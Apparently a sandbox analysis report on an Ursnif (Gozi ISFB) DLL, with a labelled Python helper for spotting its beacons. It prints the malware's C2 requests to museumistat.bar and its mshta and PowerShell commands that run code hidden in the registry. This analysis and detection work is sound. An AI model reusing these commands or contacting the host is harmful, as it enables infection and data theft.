                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 
43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Jan 19, 2022 11:50:39.179826021 CET | 3171 | OUT | GET /drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:39.507076979 CET | 3173 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecff6e9a1.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 
61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Data Ascii: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A7
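The exchanges above all have the same shape: a GET to museumistat.bar for a long, multi-segment path under /drew/ whose segments contain _2F and _2B and end in a short fake extension (.jlk), sent with an IE11 Trident User-Agent, answered with application/octet-stream whose body (the Data Raw field shows only its leading bytes) is base64 text and whose Content-Disposition filename is 13 hex digits. Two details are worth confirming by hand: the previews of the 2416-byte bodies returned at 11:50:37 and 11:50:42 are identical, and the first eight hex digits of every filename are the epoch second of that reply's own Date header, which is how PHP's uniqid() names things. The helpers below are an added example, not part of this Joe Sandbox report. They recover the base64 carried in the request path using the documented ISFB substitution of _2F for / and _2B for + (padding restored), decode a Data Raw hex field, and turn the filename into a timestamp. The sample path, headers and the first 16 body bytes are copied from the 11:50:37 exchange; the decoded path payload is still ISFB's Serpent ciphertext and is not interpreted, and the indicator names and the eight-segment threshold are this example's own choices.

```python
"""Triage helpers for the Ursnif (Gozi ISFB) HTTP exchanges in this report.

Added example, not part of the Joe Sandbox output. Sample values are copied
from the 11:50:37 exchange above; assumptions are marked in comments.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from typing import Dict, List, Optional

# Request path, headers and first 16 body bytes copied from the 11:50:37 exchange.
SAMPLE_PATH = ("/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/"
               "K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/"
               "zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/"
               "GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/"
               "UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk")
SAMPLE_REQ_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Host": "museumistat.bar",
}
SAMPLE_RESP_HEADERS = {
    "Content-Type": "application/octet-stream",
    "Content-Length": "2416",
    "Content-Disposition": 'inline; filename="61e7ecfdaae1b.bin"',
}
SAMPLE_HEX = "53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70"

# ISFB URL-escapes its base64 with '%' written as '_' ("_2F" for '/', "_2B"
# for '+'), drops the '=' padding and splits the string into random-length
# path segments under a configurable directory ("drew" in this sample).
_ISFB_ESCAPES = (("_2F", "/"), ("_2B", "+"))


def isfb_path_to_base64(path: str, dir_segments: int = 1) -> str:
    """Undo the ISFB path encoding and restore base64 padding."""
    segments = path.strip("/").split("/")[dir_segments:]
    segments[-1] = segments[-1].rsplit(".", 1)[0]      # strip the fake extension
    joined = "".join(segments)
    for token, char in _ISFB_ESCAPES:
        joined = joined.replace(token, char)
    return joined + "=" * (-len(joined) % 4)


def decode_isfb_path(path: str) -> Optional[bytes]:
    """Payload carried in the path (still Serpent ciphertext; the key is not in
    the report), or None when the path is not ISFB-shaped base64."""
    try:
        return base64.b64decode(isfb_path_to_base64(path), validate=True)
    except (binascii.Error, ValueError, IndexError):
        return None


def hex_dump_to_text(hexdump: str) -> str:
    """Decode a 'Data Raw' field; the bodies in this report are base64 text."""
    return bytes.fromhex(hexdump).decode("ascii")


def uniqid_timestamp(filename: str) -> datetime:
    """Content-Disposition names are 13 hex digits shaped like PHP uniqid():
    8 hex digits of epoch seconds then 5 of microseconds. Seconds only here."""
    secs = int(filename.split(".", 1)[0][:8], 16)
    return datetime.fromtimestamp(secs, tz=timezone.utc)


def isfb_indicators(path: str, req: Dict[str, str], resp: Dict[str, str]) -> List[str]:
    """Heuristics mirroring what the exchanges in this report have in common."""
    hits = []
    segments = path.strip("/").split("/")
    if len(segments) >= 8:                              # threshold is this example's choice
        hits.append(f"{len(segments)} path segments")
    if re.search(r"_2[FB]", path):
        hits.append("'_2F'/'_2B' escapes in path")
    if re.search(r"\.[a-z0-9]{2,4}$", path) and decode_isfb_path(path) is not None:
        hits.append("path decodes as base64 after ISFB un-escaping")
    if "Trident/7.0" in req.get("User-Agent", "") and resp.get("Content-Type") == "application/octet-stream":
        hits.append("IE11 User-Agent received application/octet-stream")
    m = re.search(r'filename="([0-9a-f]{13})\.bin"', resp.get("Content-Disposition", ""))
    if m:
        hits.append(f"uniqid()-style filename generated {uniqid_timestamp(m.group(1)).isoformat()}")
    return hits


if __name__ == "__main__":
    blob = decode_isfb_path(SAMPLE_PATH)
    print(f"path payload: {len(blob)} bytes (a multiple of the 16-byte Serpent block)")
    print("body preview:", hex_dump_to_text(SAMPLE_HEX))
    for hit in isfb_indicators(SAMPLE_PATH, SAMPLE_REQ_HEADERS, SAMPLE_RESP_HEADERS):
        print(" -", hit)
```

Run against the 11:50:37 request, the path yields 176 bytes, a whole number of 16-byte blocks, which is what a Serpent-CBC blob should look like; the same check on the other three requests above is a quick way to confirm they are beacons of the same family rather than unrelated noise. The filename-to-timestamp step is useful when correlating with proxy logs whose clocks disagree with the sandbox, since it is the server's own clock.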


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\status.dll"
                  Imagebase:0xbb0000
                  File size:116736 bytes
                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
                  Imagebase:0xd80000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\regsvr32.exe
                  Wow64 process (32bit):true
                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\status.dll
                  Imagebase:0x970000
                  File size:20992 bytes
                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\status.dll",#1
                  Imagebase:0xae0000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000005.00000003.463693625.000000000308F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:11:50:09
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
                  Imagebase:0xae0000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000006.00000002.476168753.000000000069B000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:11:50:23
                  Start date:19/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff722910000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:11:50:25
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:11:50:29
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:11:50:30
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:11:50:31
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:11:50:34
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:39
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:42
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, Author: Joe Security

                  General

                  Start time:11:50:42
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:11:50:42
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
